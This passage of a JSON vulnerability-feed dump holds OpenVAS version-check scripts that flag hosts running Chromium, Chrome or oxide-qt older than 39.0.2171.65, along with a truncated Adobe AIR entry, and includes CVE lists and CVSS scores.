rpm:\"chromedriver~39.0.2171.65~58.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~39.0.2171.65~58.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~39.0.2171.65~58.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~39.0.2171.65~58.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~39.0.2171.65~58.4\", 
rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-desktop-gnome\", rpm:\"chromium-desktop-gnome~39.0.2171.65~58.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-desktop-kde\", rpm:\"chromium-desktop-kde~39.0.2171.65~58.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo\", rpm:\"chromium-ffmpegsumo~39.0.2171.65~58.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo-debuginfo\", rpm:\"chromium-ffmpegsumo-debuginfo~39.0.2171.65~58.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-22T17:03:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2020-04-20T00:00:00", "published": "2014-11-25T00:00:00", "id": "OPENVAS:1361412562310804894", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804894", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities - 01 November14 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities - 01 November14 (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 
2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804894\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-7900\", \"CVE-2014-7901\", \"CVE-2014-7902\", \"CVE-2014-7903\",\n \"CVE-2014-7904\", \"CVE-2014-7906\", \"CVE-2014-7907\", \"CVE-2014-7908\",\n \"CVE-2014-7909\", \"CVE-2014-7910\", \"CVE-2014-7899\");\n script_bugtraq_id(71163, 71158, 71165, 71164, 71166, 71159, 71170, 71168,\n 71167, 71161, 71160);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-25 18:55:43 +0530 (Tue, 25 Nov 2014)\");\n script_name(\"Google Chrome Multiple Vulnerabilities - 01 November14 (Linux)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - A use-after-free error in pdfium.\n\n - An integer overflow error in pdfium.\n\n - Another use-after-free error in pdfium.\n\n - An unspecified error in pdfium.\n\n - An unspecified 
error in Skia.\n\n - A use-after-free error in pepper plugins.\n\n - Multiple use-after-free errors in blink.\n\n - An integer overflow error in media.\n\n - An unspecified error in Skia.\n\n - Other Multiple unspecified errors.\n\n - An unspecified error that can be exploited to spoof the address bar.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to disclose potentially sensitive information, conduct spoofing attacks,\n bypass certain security restrictions, and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 39.0.2171.65\n on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version 39.0.2171.65\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62546\");\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2014/11/stable-channel-update_18.html\");\n\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chromeVer, test_version:\"39.0.2171.65\"))\n{\n report = report_fixed_ver(installed_version:chromeVer, fixed_version:\"39.0.2171.65\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-22T17:03:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7910", 
"CVE-2014-7902", "CVE-2014-7900"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2020-04-20T00:00:00", "published": "2014-11-25T00:00:00", "id": "OPENVAS:1361412562310804892", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804892", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities - 01 November14 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities - 01 November14 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804892\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-7900\", \"CVE-2014-7901\", \"CVE-2014-7902\", \"CVE-2014-7903\",\n \"CVE-2014-7904\", \"CVE-2014-7906\", \"CVE-2014-7907\", \"CVE-2014-7908\",\n \"CVE-2014-7909\", \"CVE-2014-7910\", \"CVE-2014-7899\");\n script_bugtraq_id(71163, 71158, 71165, 71164, 71166, 71159, 71170, 71168,\n 71167, 71161, 71160);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-25 18:03:03 +0530 (Tue, 25 Nov 2014)\");\n script_name(\"Google Chrome Multiple Vulnerabilities - 01 November14 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - A use-after-free error in pdfium.\n\n - An integer overflow error in pdfium.\n\n - Another use-after-free error in pdfium.\n\n - An unspecified error in pdfium.\n\n - An unspecified error in Skia.\n\n - A use-after-free error in pepper plugins.\n\n - Multiple use-after-free errors in blink.\n\n - An integer overflow error in media.\n\n - An unspecified error in Skia.\n\n - Other Multiple unspecified errors.\n\n - An unspecified error that can be 
exploited to spoof the address bar.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to disclose potentially sensitive information, conduct spoofing attacks,\n bypass certain security restrictions, and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 39.0.2171.65\n on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version 39.0.2171.65\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62546\");\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2014/11/stable-channel-update_18.html\");\n\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_portable_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chromeVer, test_version:\"39.0.2171.65\"))\n{\n report = report_fixed_ver(installed_version:chromeVer, fixed_version:\"39.0.2171.65\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-22T17:03:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2020-04-20T00:00:00", "published": "2014-11-25T00:00:00", "id": "OPENVAS:1361412562310804893", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310804893", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities - 01 November14 (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities - 01 November14 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804893\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-7900\", \"CVE-2014-7901\", \"CVE-2014-7902\", \"CVE-2014-7903\",\n \"CVE-2014-7904\", \"CVE-2014-7906\", \"CVE-2014-7907\", \"CVE-2014-7908\",\n \"CVE-2014-7909\", \"CVE-2014-7910\", \"CVE-2014-7899\");\n script_bugtraq_id(71163, 71158, 71165, 71164, 71166, 71159, 71170, 71168,\n 71167, 71161, 71160);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", 
value:\"2014-11-25 18:46:35 +0530 (Tue, 25 Nov 2014)\");\n script_name(\"Google Chrome Multiple Vulnerabilities - 01 November14 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - A use-after-free error in pdfium.\n\n - An integer overflow error in pdfium.\n\n - Another use-after-free error in pdfium.\n\n - An unspecified error in pdfium.\n\n - An unspecified error in Skia.\n\n - A use-after-free error in pepper plugins.\n\n - Multiple use-after-free errors in blink.\n\n - An integer overflow error in media.\n\n - An unspecified error in Skia.\n\n - Other Multiple unspecified errors.\n\n - An unspecified error that can be exploited to spoof the address bar.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to disclose potentially sensitive information, conduct spoofing attacks,\n bypass certain security restrictions, and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 39.0.2171.65\n on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version 39.0.2171.65\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62546\");\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2014/11/stable-channel-update_18.html\");\n\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n\n 
exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chromeVer, test_version:\"39.0.2171.65\"))\n{\n report = report_fixed_ver(installed_version:chromeVer, fixed_version:\"39.0.2171.65\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7908", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7910"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-11-20T00:00:00", "id": "OPENVAS:1361412562310842037", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842037", "type": "openvas", "title": "Ubuntu Update for oxide-qt USN-2410-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2410_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for oxide-qt USN-2410-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842037\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-11-20 06:42:55 +0100 (Thu, 20 Nov 2014)\");\n script_cve_id(\"CVE-2014-7904\", \"CVE-2014-7907\", \"CVE-2014-7908\", \"CVE-2014-7909\",\n \"CVE-2014-7910\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Ubuntu Update for oxide-qt USN-2410-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'oxide-qt'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A buffer overflow was discovered in Skia. If a\nuser were tricked into opening a specially crafted website, an attacker could\npotentially exploit this to cause a denial of service via renderer crash or execute\narbitrary code with the privileges of the sandboxed render process. (CVE-2014-7904)\n\nMultiple use-after-frees were discovered in Blink. If a user were tricked\ninto opening a specially crafted website, an attacker could potentially\nexploit these to cause a denial of service via renderer crash or execute\narbitrary code with the privileges of the sandboxed render process.\n(CVE-2014-7907)\n\nAn integer overflow was discovered in media. 
If a user were tricked into\nopening a specially crafted website, an attacker could potentially exploit\nthis to cause a denial of service via renderer crash or execute arbitrary\ncode with the privileges of the sandboxed render process. (CVE-2014-7908)\n\nAn uninitialized memory read was discovered in Skia. If a user were\ntricked into opening a specially crafted website, an attacker could\npotentially exploit this to cause a denial of service via renderer crash.\n(CVE-2014-7909)\n\nMultiple security issues were discovered in Chromium. If a user were\ntricked into opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial of\nservice via application crash or execute arbitrary code with the\nprivileges of the user invoking the program. (CVE-2014-7910)\");\n script_tag(name:\"affected\", value:\"oxide-qt on Ubuntu 14.10,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2410-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2410-1/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.3.4-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.3.4-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs:amd64\", ver:\"1.3.4-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs:i386\", ver:\"1.3.4-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs-extra:amd64\", ver:\"1.3.4-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs-extra:i386\", ver:\"1.3.4-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0\", ver:\"1.3.4-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs\", ver:\"1.3.4-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs-extra\", ver:\"1.3.4-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3200", "CVE-2014-7899", "CVE-2014-3192", "CVE-2014-3193", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-3194", "CVE-2014-3198", "CVE-2014-7901", "CVE-2014-3199", "CVE-2014-7903", "CVE-2014-3189", "CVE-2014-3191", "CVE-2014-7910", "CVE-2014-3195", "CVE-2014-3197", "CVE-2014-3190", "CVE-2014-3188", "CVE-2014-7902", 
"CVE-2014-7900"], "description": "Gentoo Linux Local Security Checks GLSA 201412-13", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121299", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121299", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201412-13", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201412-13.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121299\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:10 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201412-13\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Chromium. 
Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201412-13\");\n script_cve_id(\"CVE-2014-3188\", \"CVE-2014-3189\", \"CVE-2014-3190\", \"CVE-2014-3191\", \"CVE-2014-3192\", \"CVE-2014-3193\", \"CVE-2014-3194\", \"CVE-2014-3195\", \"CVE-2014-3197\", \"CVE-2014-3198\", \"CVE-2014-3199\", \"CVE-2014-3200\", \"CVE-2014-7899\", \"CVE-2014-7900\", \"CVE-2014-7901\", \"CVE-2014-7902\", \"CVE-2014-7903\", \"CVE-2014-7904\", \"CVE-2014-7906\", \"CVE-2014-7907\", \"CVE-2014-7908\", \"CVE-2014-7909\", \"CVE-2014-7910\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201412-13\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-client/chromium\", unaffected: make_list(\"ge 39.0.2171.65\"), vulnerable: make_list(\"lt 39.0.2171.65\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-22T17:03:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", 
"CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "description": "This host is installed with Adobe AIR\n and is prone to multiple vulnerabilities.", "modified": "2020-04-20T00:00:00", "published": "2014-11-14T00:00:00", "id": "OPENVAS:1361412562310804797", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804797", "type": "openvas", "title": "Adobe AIR Multiple Vulnerabilities(APSB14-24)-(Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe AIR Multiple Vulnerabilities(APSB14-24)-(Mac OS X)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804797\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-0573\", \"CVE-2014-0574\", \"CVE-2014-0576\", \"CVE-2014-0577\",\n \"CVE-2014-0581\", \"CVE-2014-0582\", \"CVE-2014-0583\", \"CVE-2014-0584\",\n \"CVE-2014-0585\", \"CVE-2014-0586\", \"CVE-2014-0588\", \"CVE-2014-0589\",\n \"CVE-2014-0590\", \"CVE-2014-8437\", \"CVE-2014-8438\", \"CVE-2014-8440\",\n \"CVE-2014-8441\", \"CVE-2014-8442\");\n script_bugtraq_id(71033, 71041, 71037, 71038, 71042, 71039, 71035, 71043, 71044,\n 71045, 71048, 71051, 71046, 71036, 71049, 71047, 71050, 71040);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-14 11:58:00 +0530 (Fri, 14 Nov 2014)\");\n script_name(\"Adobe AIR Multiple Vulnerabilities(APSB14-24)-(Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe AIR\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - An 